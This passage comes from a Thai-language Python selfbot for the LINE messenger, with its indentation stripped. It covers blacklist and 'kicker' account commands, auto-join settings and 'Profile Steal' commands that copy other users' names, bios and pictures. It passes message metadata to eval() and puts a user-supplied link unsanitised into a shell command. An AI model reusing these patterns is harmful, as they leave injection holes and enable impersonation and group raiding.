msgs = "ป้องกันยกเลิกเชิญบอทปิดใช้งาน"
line.sendMessage(msg.to, "??STATUS PROTECT CANCEL👊\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "ป้องกันยกเลิกเชิญถูกเปิดใช้งานอยู่แล้ว"
else:
protectcancel[msg.to] = True
f=codecs.open('protectcancel.json','w','utf-8')
json.dump(protectcancel, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT CANCEL👊\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
del protectcancel[msg.to]
f=codecs.open('protectcancel.json','w','utf-8')
json.dump(protectcancel, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
msgs = "ป้องกันยกเลิกเชิญถูกปิดใช้งานอยู่แล้ว"
line.sendMessage(msg.to, "👊STATUS PROTECT CANCEL👊\n" + msgs)
elif 'Po4 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Po4 ','')
if spl == 'on':
if msg.to in protectinvite:
msgs = "InviteProtect Start"
else:
protectinvite[msg.to] = True
f=codecs.open('protectinvite.json','w','utf-8')
json.dump(protectinvite, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "InviteProtect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT CANCEL👊\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
del protectinvite[msg.to]
f=codecs.open('protectinvite.json','w','utf-8')
json.dump(protectinvite, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "InviteProtect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "InviteProtect Trun off"
line.sendMessage(msg.to, "👊STATUS PROTECT CANCEL👊\n" + msgs)
elif 'กันjs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('กันjs ','')
if spl == 'on':
if msg.to in protectantijs:
msgs = "ป้องกันJSถูกเปิดใช้งานอยู่แล้ว"
else:
protectantijs[msg.to] = True
f=codecs.open('protectantijs.json','w','utf-8')
json.dump(protectantijs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันJSเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT JS👊\n" + msgs)
elif spl == 'off':
if msg.to in protectantijs:
del protectantijs[msg.to]
f=codecs.open('protectantijs.json','w','utf-8')
json.dump(protectantijs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันJSปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
msgs = "ป้องกันJSถูกปิดใช้งานอยู่แล้ว"
line.sendMessage(msg.to, "👊STATUS PROTECT JS👊\n" + msgs)
elif "whois " in msg.text.lower():
spl = re.split("whois ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
msg.contentType = 13
msg.text = None
msg.contentMetadata = {"mid":spl[1]}
line.sendMessage(msg.to,text = None,contentMetadata = {"mid":spl[1]},contentType = 13)
elif 'Ghost ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Ghost ','')
if spl == 'on':
if msg.to in ghost:
msgs = "เปิดใช้งานโหมด Ghost"
else:
ghost[msg.to] = True
f=codecs.open('ghost.json','w','utf-8')
json.dump(ghost, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "เปิดใช้งานโหมด Ghost\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif spl == 'off':
if msg.to in ghost:
del ghost[msg.to]
f=codecs.open('ghost.json','w','utf-8')
json.dump(ghost, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ปิดใช้งานโหมด Ghost\nIn Group : " +str(ginfo.name)
else:
msgs = "ปิดใช้งานโหมด Ghost"
line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
line.sendMessage(msg.to,"เพิ่มบัญชีดำสำเร็จแล้ว")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
line.sendMessage(msg.to,"ลบบัญชีดำสำเร็จแล้ว")
except:
pass
elif cmd == "ban":
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
line.sendMessage(to,"Send contact you will be blacklist")
elif cmd == "unban":
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
line.sendMessage(to,"Send contact you will be whitelist")
elif cmd == "change pp":
link = removeCmd("change pp", text)
contact = client.getContact(sender)
pic = "http://dl.profile.line-cdn.net/{}".format(contact.pictureStatus)
subprocess.getoutput('youtube-dl --format mp4 --output TeamAnuBot.mp4 {}'.format(link))
pict = line.downloadFileURL(pic)
vids = "TeamAnuBot.mp4"
time.sleep(2)
changeVideoAndPictureProfile(pict, vids)
line.sendReplyMessage(msg.id,to, "Changed dual picture & video.", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+client.getContact(clientMID).pictureStatus, 'AGENT_NAME': '', 'AGENT_LINK': 'http://line.me/ti/p/~anyun2k15'})
os.remove("TeamAnuBot.mp4")
elif cmd == "ดำ":
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
line.sendMessage(msg.to,"👊ไม่พบผู้ติดบัญชีแดง👊")
else:
ma = ""
for i in wait["blacklist"]:
ma = line.getContact(i)
line.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "cb":
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = line.getContacts(wait["blacklist"])
mc = "「%i」ลบดำเรียบร้อย" % len(ragets)
line.sendMessage(to,"Succes Clear Blacklist " +mc)
kicker.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker2.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker3.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker4.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker5.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker6.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker7.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker8.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker9.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker10.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
#===========BOT UPDATE============#
elif cmd.startswith('error'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Error 」'
res += '\n├👊 Usage : '
res += '\n│🌷 {key}Error'
res += '\n│🌷 {key}Error Logs'
res += '\n│🌷 {key}Error Reset'
res += '\n│🌷 {key}Error Detail <errid>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'error':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cond[0].lower() == 'logs':
try:
filee = open('errorLog.txt', 'r')
except FileNotFoundError:
return line.sendMessage(to, 'ไม่สามารถแสดงบันทึกข้อผิดพลาดได้\nไม่พบไฟล์')
errors = [err.strip() for err in filee.readlines()]
filee.close()
if not errors: return line.sendMessage(to, 'ไม่สามารถแสดงบันทึกข้อผิดพลาดได้\nบันทึกข้อผิดพลาดว่างเปล่า')
res = '╭───「 Error Logs 」'
res += '\n├ List :'
parsed_len = len(errors)//200+1
no = 0
for point in range(parsed_len):
for error in errors[point*200:(point+1)*200]:
if not error: continue
no += 1
res += '\n│ %i. %s' % (no, error)
if error == errors[-1]:
res += '\n╰───【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif cond[0].lower() == 'reset':
filee = open('errorLog.txt', 'w')
filee.write('')
filee.close()
shutil.rmtree('tmp/errors/', ignore_errors=True)
os.system('mkdir tmp/errors')
line.sendMessage(to, 'Success reset error logs')
elif cond[0].lower() == 'detail':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
errid = cond[1]
if os.path.exists('tmp/errors/%s.txt' % errid):
with open('tmp/errors/%s.txt' % errid, 'r') as f:
line.sendMessage(to, f.read())
else:
return line.sendMessage(to, 'Failed display details error, errorid not valid')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif txt.startswith('setkey'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Setting Key 」'
res += '\n├👊 Status : ' + bool_dict[settings['setKey']['status']][1]
res += '\n├👊 Key : ' + settings['setKey']['key'].title()
res += '\n├👊 Usage : '
res += '\n│🌷 Setkey'
res += '\n│🌷 Setkey <on/off>'
res += '\n│🌷 Setkey <key>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if txt == 'setkey':
line.sendMessage(to, parsingRes(res))
elif texttl == 'on':
if settings['setKey']['status']:
line.sendMessage(to, 'Failed activate setkey, setkey already active')
else:
settings['setKey']['status'] = True
line.sendMessage(to, 'Success activated setkey')
elif texttl == 'off':
if not settings['setKey']['status']:
line.sendMessage(to, 'Failed deactivate setkey, setkey already deactive')
else:
settings['setKey']['status'] = False
line.sendMessage(to, 'Success deactivated setkey')
else:
settings['setKey']['key'] = texttl
line.sendMessage(to, 'Success change set key to (%s)' % textt)
elif cmd.startswith('autoadd'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Auto Add 」'
res += '\n├👊 Status : ' + bool_dict[settings['autoAdd']['status']][1]
res += '\n├👊 Reply : ' + bool_dict[settings['autoAdd']['reply']][0]
res += '\n├👊 Reply Message : ' + settings['autoAdd']['message']
res += '\n├👊 Usage : '
res += '\n│🌷 {key}AutoAdd'
res += '\n│🌷 {key}AutoAdd <on/off>'
res += '\n│🌷 {key}AutoAdd Reply <on/off>'
res += '\n│🌷 {key}AutoAdd <message>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'autoadd':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoAdd']['status']:
line.sendMessage(to, 'เปิดรับแอดออโต้')
else:
settings['autoAdd']['status'] = True
line.sendMessage(to, 'เปิดรับแอดออโต้')
elif texttl == 'off':
if not settings['autoAdd']['status']:
line.sendMessage(to, 'ปิดรับแอดออโต้')
else:
settings['autoAdd']['status'] = False
line.sendMessage(to, 'ปิดรับแอดออโต้')
elif cond[0].lower() == 'reply':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoAdd']['reply']:
line.sendMessage(to, 'เปิดข้อความทักคนแอด')
else:
settings['autoAdd']['reply'] = True
line.sendMessage(to, 'เปิดข้อความทักคนแอด')
elif cond[1].lower() == 'off':
if not settings['autoAdd']['reply']:
line.sendMessage(to, 'ปิดข้อความทักคนแอด')
else:
settings['autoAdd']['reply'] = False
line.sendMessage(to, 'ปิดข้อความทักคนแอด')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
settings['autoAdd']['message'] = textt
line.sendMessage(to, 'เปลี่ยนข้อความออโต้แอดเป็น `%s`' % textt)
elif cmd.startswith('autojoin'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Auto Join 」'
res += '\n├👊 Status : ' + bool_dict[settings['autoJoin']['status']][1]
res += '\n├👊 Reply : ' + bool_dict[settings['autoJoin']['reply']][0]
res += '\n├👊 Reply Message : ' + settings['autoJoin']['message']
res += '\n├👊 Usage : '
res += '\n│🌷 {key}AutoJoin'
res += '\n│🌷 {key}AutoJoin <on/off>'
res += '\n│🌷 {key}AutoJoin Ticket <on/off>'
res += '\n│🌷 {key}AutoJoin Reply <on/off>'
res += '\n│🌷 {key}AutoJoin <message>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'autojoin':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoJoin']['status']:
line.sendMessage(to, 'เปิดเข้าร่วมกลุ่มออโต้')
else:
settings['autoJoin']['status'] = True
line.sendMessage(to, 'เปิดเข้าร่วมกลุ่มออโต้')
elif texttl == 'off':
if not settings['autoJoin']['status']:
line.sendMessage(to, 'ปิดเข้าร่วมกลุ่มออโต้')
else:
settings['autoJoin']['status'] = False
line.sendMessage(to, 'ปิดเข้าร่วมกลุ่มออโต้')
elif cond[0].lower() == 'reply':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoJoin']['reply']:
line.sendMessage(to, 'เปิดความทักคนเชิญเข้ากลุ่ม')
else:
settings['autoJoin']['reply'] = True
line.sendMessage(to, 'เปิดความทักคนเชิญเข้ากลุ่ม')
elif cond[1].lower() == 'off':
if not settings['autoJoin']['reply']:
line.sendMessage(to, 'ปิดความทักคนเชิญเข้ากลุ่ม')
else:
settings['autoJoin']['reply'] = False
line.sendMessage(to, 'ปิดความทักคนเชิญเข้ากลุ่ม')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd == "autoblock on" or text.lower() == 'บล็อค เปิด':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoBlock"] = True
aditmadzs.sendMessage(msg.to,"เปิดออโต้บล็อคเรียบร้อย...")
elif cmd == "autoblock off" or text.lower() == 'บล็อค ปิด':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoBlock"] = False
aditmadzs.sendMessage(msg.to,"ปิดออโต้บล็อคเรียบร้อย...")
elif cond[0].lower() == 'ticket':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoJoin']['ticket']:
line.sendMessage(to, 'เปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
settings['autoJoin']['ticket'] = True
line.sendMessage(to, 'เปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
elif cond[1].lower() == 'off':
if not settings['autoJoin']['ticket']:
line.sendMessage(to, 'ปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
settings['autoJoin']['ticket'] = False
line.sendMessage(to, 'ปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
settings['autoJoin']['message'] = textt
line.sendMessage(to, 'ข้อความทักคนเชิญเข้ากลุ่มเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autorespondmention'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Auto Respond 」'
res += '\n├👊 Status : ' + bool_dict[settings['autoRespondMention']['status']][1]
res += '\n├👊 Reply Message : ' + settings['autoRespondMention']['message']
res += '\n├👊 Usage : '
res += '\n│🌷 {key}AutoRespondMention'
res += '\n│🌷 {key}AutoRespondMention <on/off>'
res += '\n│🌷 {key}AutoRespondMention <message>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'autorespondmention':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoRespondMention']['status']:
line.sendMessage(to, 'เปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['status'] = True
line.sendMessage(to, 'เปิดตอบกลับคนแทค')
elif texttl == 'off':
if not settings['autoRespondMention']['status']:
line.sendMessage(to, 'ปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['status'] = False
line.sendMessage(to, 'ปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['message'] = textt
line.sendMessage(to, 'ข้อความตอบกลับคนแทคเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autorespond'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Auto Respond 」'
res += '\n├👊 Status : ' + bool_dict[settings['autoRespond']['status']][1]
res += '\n├👊 Reply Message : ' + settings['autoRespond']['message']
res += '\n├👊 Usage : '
res += '\n│🌷 {key}AutoRespond'
res += '\n│🌷 {key}AutoRespond <on/off>'
res += '\n│🌷 {key}AutoRespond <message>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'autorespond':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoRespond']['status']:
line.sendMessage(to, 'เปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['status'] = True
line.sendMessage(to, 'เปิดตอบกลับอัตโนมัติ')
elif texttl == 'off':
if not settings['autoRespond']['status']:
line.sendMessage(to, 'ปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['status'] = False
line.sendMessage(to, 'ปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['message'] = textt
line.sendMessage(to, 'ข้อความเปิดตอบกลับอัตโนมัติถูกเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autoread '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['autoRead']:
line.sendMessage(to, 'เปิดอ่านออโต้')
else:
settings['autoRead'] = True
line.sendMessage(to, 'เปิดอ่านออโต้')
elif texttl == 'off':
if not settings['autoRead']:
line.sendMessage(to, 'ปิดอ่านออโต้')
else:
settings['autoRead'] = False
line.sendMessage(to, 'ปิดอ่านออโต้')
elif cmd.startswith('checkcontact '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkContact']:
line.sendMessage(to, 'เปิดเช็คคท')
else:
settings['checkContact'] = True
line.sendMessage(to, 'เปิดเช็คคท')
elif texttl == 'off':
if not settings['checkContact']:
line.sendMessage(to, 'ปิดเช็คคท')
else:
settings['checkContact'] = False
line.sendMessage(to, 'ปิดเช็คคท')
elif cmd.startswith('checkpost '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkPost']:
line.sendMessage(to, 'เปิดเช็คโพส')
else:
settings['checkPost'] = True
line.sendMessage(to, 'เปิดเช็คโพส')
elif texttl == 'off':
if not settings['checkPost']:
line.sendMessage(to, 'ปิดเช็คโพส')
else:
settings['checkPost'] = False
line.sendMessage(to, 'ปิดเช็คโพส')
elif cmd.startswith('checksticker '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkSticker']:
line.sendMessage(to, 'เปิดเช็คสติ๊กเกอร์')
else:
settings['checkSticker'] = True
line.sendMessage(to, 'เปิดเช็คสติ๊กเกอร์')
elif texttl == 'off':
if not settings['checkSticker']:
line.sendMessage(to, 'ปิดเช็คสติ๊กเกอร์')
else:
settings['checkSticker'] = False
line.sendMessage(to, 'ปิดเช็คสติ๊กเกอร์')
elif cmd.startswith('จัดไป1'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
profile = line.getProfile()
res = '╭━━━🌷ข้อมูล ส่วนตัว วิไล🌷'
res += '\n║👊 ไอดี : ' + profile.mid
res += '\n║👊 Display ชื่อ : ' + str(profile.displayName)
res += '\n║👊 Usage : '
res += '\n║👼 {key}จัดไป1'
res += '\n║👼 {key}จัดไป ไอดี'
res += '\n║👼 {key}จัดไป ชื่อ'
res += '\n║👼 {key}จัดไป ตัส'
res += '\n║👼 {key}จัดไป รูป'
res += '\n║👼 {key}จัดไป ปก'
res += '\n║👼 {key)จัดไป ตั้ง ชื่อ ❨พิมพ์❩'
res += '\n║👼 {key}จัดไป ตั้ง ตัส ❨พิมพ์❩'
res += '\n║👼 {key}จัดไป ตั้ง รูป ❨ส่งภาพ❩'
res += '\n║👼 {key}จัดไป ตั้ง ปก ❨ส่งภาพ❩'
res += '\n╰━━━👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if texttl == 'ไอดี':
line.sendMessage(to, '💟 นี้แหละไอดีผู้สร้าง 💟\n' + str(profile.mid))
elif texttl == 'ชื่อ':
line.sendMessage(to, '💟 นี้แหละชื่อผู้สร้าง 💟\n' + str(profile.displayName))
elif texttl == 'ตัส':
line.sendMessage(to, '💟 นี้แหละตัสผู้สร้าง 💟\n' + str(profile.statusMessage))
elif texttl == 'รูป':
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
line.sendMessage(to, '💟 Picture Status 💟\n' + path)
else:
line.sendMessage(to, 'ไม่สามารถแสดงรูปได้เนื่องจากผู้ใช้นี้ไม่ได้ใส่รูป')
elif texttl == 'ปก':
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, '💟 Cover Picture 💟\n' + str(cover))
elif texttl.startswith('ตั้ง '):
texts = textt[7:]
textsl = texts.lower()
if textsl.startswith('ชื่อ '):
name = texts[5:]
if len(name) <= 20:
profile.displayName = name
line.updateProfile(profile)
line.sendMessage(to, 'เปลี่ยนชื่อสำเร็จ\nเปลี่ยนชื่อเป็น`%s`' % name)
else:
line.sendMessage(to, 'ไม่สามารถเปลี่ยนชื่อได้\nความยาวของชื่อต้องไม่เกิน 20')
elif textsl.startswith('ตัส '):
bio = texts[4:]
if len(bio) <= 3000:
profile.statusMessage = bio
line.updateProfile(profile)
line.sendMessage(to, 'เปลี่ยนสถานะเรียบร้อย\nเปลี่ยนสถนานะเป็น `%s`' % bio)
else:
line.sendMessage(to, 'ไม่สามารถเปลี่ยนสถานะได้\nความยาวของข้อความสถานะต้องไม่เกิน3000')
elif textsl == 'รูป':
settings['changePictureProfile'] = True
line.sendMessage(to, 'กรุณาส่งภาพเพื่อเปลี่ยนรูปโปรไฟล์, พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
elif textsl == 'ปก':
settings['changeCoverProfile'] = True
line.sendMessage(to, 'กรุณาส่งภาพเพื่อเปลี่ยนรูปปก, พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('จัดไป'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
profile = line.getContact(to) if msg.toType == 0 else None
res = '╭━━━🌷 เอา ข้อมูล จัดไป 🌷'
if profile:
res += '\n║👊 ไอดี: ' + profile.mid
res += '\n║👊 ชื่อ : ' + str(profile.displayName)
if profile.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(profile.displayNameOverridden)
res += '\n║👊 Status ข้อความ : ' + str(profile.statusMessage)
res += '\n║👊 Usage : '
res += '\n║👼 {key}จัดไป'
res += '\n║👼 {key}จัดไป ไอดี'
res += '\n║👼 {key}จัดไป ชื่อ'
res += '\n║👼 {key}จัดไป ตัส'
res += '\n║👼 {key}จัดไป รูป'
res += '\n║👼 {key}จัดไป ปก'
res += '\n║👼 {key}Profile Steal Profile <mention>'
res += '\n║👼 {key}Profile Steal Mid <mention>'
res += '\n║👼 {key}Profile Steal Name <mention>'
res += '\n║👼 {key}Profile Steal Bio <mention>'
res += '\n║👼 {key}Profile Steal Pict <mention>'
res += '\n║👼 {key}Profile Steal Cover <mention>'
res += '\n╰━━━👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if texttl == 'ไอดี':
if msg.toType != 0: return line.sendMessage(to, '🙄สัส...คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น...ควย🙄')
line.sendMessage(to, '💟 นี้แหละไอดีฉัน 💟\n' + str(profile.mid))
elif texttl == 'ชื่อ':
if msg.toType != 0: return line.sendMessage(to, '🙄สัส...คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น...ควย🙄')
line.sendMessage(to, '💟 นี้แหละชื่อฉัน 💟\n' + str(profile.displayName))
elif texttl == 'ตัส':
if msg.toType != 0: return line.sendMessage(to, '🙄สัส...คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น...ควย🙄')
line.sendMessage(to, '💟 นี้แหละสถานะของฉัน 💟\n' + str(profile.statusMessage))
elif texttl == 'รูป':
if msg.toType != 0: return line.sendMessage(to, '🙄...คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น...ควย🙄')
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
line.sendMessage(to, '💟 Picture Status 💟\n' + path)
else:
line.sendMessage(to, '🙄ควย...ไม่สามารถแสดงรูปได้เนื่องจากผู้ใช้นี้ลบบัญชีไปแล้ว🙄')
elif texttl == 'ปก':
if msg.toType != 0: return line.sendMessage(to, '🙄สัส...คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น..ควย🙄')
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, '💟 Cover Picture 💟\n' + str(cover))
elif texttl.startswith('steal '):
texts = textt[6:]
textsl = texts.lower()
if textsl.startswith('profile '):
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
profile = line.getContact(mention['M'])
if profile.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + profile.pictureStatus)
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
res = '╭━━━🌷 เอา ข้อมูล จัดไป 🌷'
res += '\n║👊 ไอดี : ' + profile.mid
res += '\n║👊 ชื่อ : ' + str(profile.displayName)
if profile.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(profile.displayNameOverridden)
res += '\n║👊 Status ข้อความ : ' + str(profile.statusMessage)
res += '\n╰━━━👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, '🙄ควย..อะไรของมึง, แทคชื่อด้วยสิ🙄')
elif textsl.startswith('mid '):
res = '╭───「 Mid」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
mid = mentions['MENTIONEES'][0]['M']
return line.sendMessage(to, '「 MID 」\n' + mid)
for mention in mentions['MENTIONEES']:
mid = mention['M']
no += 1
res += '\n│ %i. %s' % (no, mid)
res += '\n╰━━━👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, '🙄สัส...มึงก็แทคชื่อด้วยสิควย🙄')
elif textsl.startswith('name '):
res = '╭───「 Display Name 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
return line.sendMessage(to, '「 Display Name 」\n' + str(profile.displayName))
for mention in mentions['MENTIONEES']:
mid = mention['M']
profile = line.getContact(mid)
no += 1
res += '\n│ %i. %s' % (no, profile.displayName)
res += '\n╰━━━👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงชื่อได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('bio '):
res = '╭───「 Status Message 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
return line.sendMessage(to, '「 Status Message 」\n' + str(profile.statusMessage))
for mention in mentions['MENTIONEES']:
mid = mention['M']
profile = line.getContact(mid)
no += 1
res += '\n│ %i. %s' % (no, profile.statusMessage)
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงสถานะได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('pict '):
res = '╭───「 Picture Status 」'
no = 0
